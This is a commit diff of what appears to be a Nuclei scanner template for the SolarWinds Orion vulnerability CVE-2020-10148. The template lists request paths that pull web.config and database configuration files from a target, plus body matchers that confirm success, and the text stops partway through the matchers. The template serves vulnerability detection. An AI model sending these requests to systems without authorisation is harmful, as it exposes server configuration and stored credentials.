🔨 Simplify matchers & add more references

patch-1
Dwi Siswanto 2020-12-31 15:40:10 +07:00
parent d89f980768
commit 87f2961ed0
1 changed files with 7 additions and 7 deletions

View File

@ -9,21 +9,21 @@ info:
commands which may result in a compromise of the SolarWinds instance.
# References:
# - https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/solarwinds-lfi-cve-2020-10148.yaml
# - https://gist.github.com/0xsha/75616ef6f24067c4fb5b320c5dfa4965
# - https://kb.cert.org/vuls/id/843464
# - https://twitter.com/0xsha/status/1343813359355850752
requests:
- method: GET
path:
- "{{BaseURL}}/web.config.i18n.ashx"
- "{{BaseURL}}/web.config.i18n.ashx?l=nuclei&v=nuclei"
- "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei"
matchers-condition: and
matchers:
- type: word
words:
- "orionProxy"
- "sw.web.compression"
- "SolarWinds.Orion.Core."
condition: or
- type: regex
regex:
- "SolarWinds(\\.Orion\\.Core\\.|OrionDatabaseUser)"
part: body
- type: status
status: